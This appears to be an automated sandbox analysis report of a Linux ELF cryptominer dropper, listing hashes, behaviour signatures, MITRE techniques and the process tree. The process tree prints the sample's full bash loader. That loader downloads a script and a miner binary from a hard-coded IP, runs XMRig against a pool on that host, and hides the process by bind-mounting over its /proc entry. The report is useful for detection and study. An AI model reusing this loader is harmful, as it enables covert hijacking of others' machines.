Analysis
- Max time kernel: 149s
- Max time network: 150s
- Platform: ubuntu-22.04_amd64
- Resource: ubuntu2204-amd64-20240611-en
- Resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
- Submitted: 18/10/2024, 01:38
- Static task: static1
- Behavioral task: behavioral1
- Sample: 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
- Resource: ubuntu2204-amd64-20240611-en
General
- Target: 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
- Size: 15KB
- MD5: aee014a523b65c8d3b7bdb92765d305c
- SHA1: dfb9d0cada5cf03c3dfa4479865955311e6a54f9
- SHA256: 481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282
- SHA512: 4b9d43d58bd6ff61dc563d55dea121f94040ab24137154f2dfe03b342c8ae96676ca438302ff7d63b68d4e34bb8bcdd94909cb56002d3feef73820ca8b3969d8
- SSDEEP: 384:Zr+Ken0Xvn/3PHfXvn/3PHfayqC6UNwA42KW9XxqZeMm:s90Xvn/3PHfXvn/3PHfayqC6U+6XxqgR
Malware Config
Signatures

XMRig Miner payload (2 IoCs)
- behavioral1/files/fstream-3.dat: yara rule family_xmrig
- behavioral1/files/fstream-3.dat: yara rule xmrig

File and Directory Permissions Modification (1 TTP, 3 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
- PID 1604: bash
- PID 1616: chmod
- PID 1628: chmod

Executes dropped EXE (1 IoC)
- /root/.sysemd/sysemd, PID 1631: sysemd

Checks hardware identifiers (DMI) (1 TTP, 4 IoCs)
Checks DMI information which indicates whether the system is a virtual machine.
- File opened for reading: /sys/devices/virtual/dmi/id/product_name (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/board_vendor (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/bios_vendor (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/sys_vendor (sysemd)

Enumerates running processes
Discovers information about currently running processes on the system.
Reads hardware information (1 TTP, 14 IoCs)
Accesses system info like serial numbers, manufacturer names, etc.
- File opened for reading: /sys/devices/virtual/dmi/id/product_version (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/product_serial (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/board_version (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/board_asset_tag (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/product_uuid (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_vendor (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_version (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_serial (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_asset_tag (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/board_name (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/board_serial (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/chassis_type (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/bios_version (sysemd)
- File opened for reading: /sys/devices/virtual/dmi/id/bios_date (sysemd)
Checks CPU configuration (1 TTP, 2 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
- File opened for reading: /proc/cpuinfo (grep)
- File opened for reading: /proc/cpuinfo (sysemd)
Reads CPU attributes (1 TTP, 46 IoCs)
Enumerates kernel/hardware configuration (1 TTP, 27 IoCs)
Reads contents of the /sys virtual filesystem to enumerate system information.
Reads runtime system information
Processes

- /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  Command: /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  PID: 1604
- /bin/bash
  Command: /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c "exec '/tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf' \"\$@\"" /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  PID: 1604
- /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  Command: /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  PID: 1604
- /bin/bash
  Command: /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf -c " #!/bin/bash cpu_num=`grep -c \"model name\" /proc/cpuinfo` cpu_used=`expr \$cpu_num / 2` #echo \$s dir=\$(pwd) if [ `whoami` = \"root\" ];then cd ~ && mkdir .sysemd >/dev/null 2>&1 cd .sysemd >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 n=\$(cat .num) kill -9 \$n >/dev/null 2>&1 curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh && chmod +x go.sh sleep 1 sed -i \"3s/20/\${cpu_used}/\" go.sh curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd && chmod +x sysemd sleep 1 sh go.sh sleep 3 pid=\$(top -b -n1 | grep sysemd | head -1 | awk '{print \$1}') echo \$pid > .num mount -o bind /tmp /proc/\$pid >/dev/null 2>&1 rm -f go.sh sysemd >/dev/null 2>&1 fi " /tmp/481f0641074b3307b21a264987be6c2ba24c76f206334f97ccbac1cf50993282.elf
  Signatures: File and Directory Permissions Modification
  PID: 1604
  - /usr/bin/grep (PID 1605): grep -c "model name" /proc/cpuinfo
    Signatures: Checks CPU configuration
  - /usr/bin/expr (PID 1606): expr 1 / 2
  - /usr/bin/whoami (PID 1608): whoami
  - /usr/bin/mkdir (PID 1609): mkdir .sysemd
  - /usr/bin/rm (PID 1610): rm -f go.sh sysemd
  - /usr/bin/cat (PID 1611): cat .num
  - /usr/bin/curl (PID 1612): curl -s http://104.168.101.23:1234/crack/go.sh -o go.sh
  - /usr/bin/chmod (PID 1616): chmod +x go.sh
    Signatures: File and Directory Permissions Modification
  - /usr/bin/sleep (PID 1617): sleep 1
  - /usr/bin/sed (PID 1618): sed -i 3s/20/0/ go.sh
  - /usr/bin/curl (PID 1619): curl -s http://104.168.101.23:1234/crack/sysemd -o sysemd
  - /usr/bin/chmod (PID 1628): chmod +x sysemd
    Signatures: File and Directory Permissions Modification
  - /usr/bin/sleep (PID 1629): sleep 1
  - /usr/bin/sh (PID 1630): sh go.sh
    - /root/.sysemd/sysemd (PID 1631): ./sysemd -o 104.168.101.23:34512 -t 0 -p xm3 --randomx-1gb-pages -k -B
      Signatures: Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration
  - /usr/bin/sleep (PID 1633): sleep 3
  - /usr/bin/grep (PID 1642): grep sysemd
  - /usr/bin/top (PID 1641): top -b -n1
    Signatures: Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information
  - /usr/bin/head (PID 1643): head -1
  - /usr/bin/awk (PID 1644): awk "{print \$1}"
  - /usr/bin/mount (PID 1645): mount -o bind /tmp /proc/1632
  - /usr/bin/rm (PID 1647): rm -f go.sh sysemd
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (2)
  - System Checks (2)
Downloads

- Filesize: 5B
  MD5: 679359fe74d809a6564f60e75585ed3b
  SHA1: 7f114e9dc091154c365576d4702a63392f88704e
  SHA256: d05dd95f7ec068988015cb6c4536510191eaba0ebbd7a6c9feb55c73650cc698
  SHA512: 9b493b0a9a67bcb95df947fc628ab7366ed6f5136267782dc0c967063244b5e4acacc32a22242b8fc506f22cdfe91eb802165e4c7d12e07de79563453f3e05a7
- Filesize: 87B
  MD5: 496b34eb065a5f2a4b2455f207d890b2
  SHA1: dc170fb3d571ef0b238e33fcae8c2bc50e1e4fd1
  SHA256: 728055874a80558d3900fded78c97584d4728e1bd9124db9d20b8953edacb8c4
  SHA512: f9774855d64f46b232f93601430db18bd470067372a09c3933d19ca19658eb21d9c6d4f4d1ef49a7e1d0526e6f67d40d9e33e54c8f0867050c0d348635b19e47
- Filesize: 86B
  MD5: 6bcf2d2ea1ceb1766c5bfbf8728a57e3
  SHA1: e542eee55d92c4f5e3fbb86c244edf04afdfee22
  SHA256: 53bff9f21bdaa669c662f3d9c3a4d7f236e063f75ce418874d55674ea6125796
  SHA512: 00d0dd6643a22d7e63a559a5dd7f48cd61f26a5c214e308fbd3dcb6a1238d553f89f7af51a92465004b117b9cd08c1df2c2e46875f5a8f61ed467dc87cd9b598
- Filesize: 6.7MB
  MD5: 8f633ade35df4f992eb28a2c5bc37cef
  SHA1: 6b2fe529339896b22328dec8936219e7b8e3252f
  SHA256: 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
  SHA512: 8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73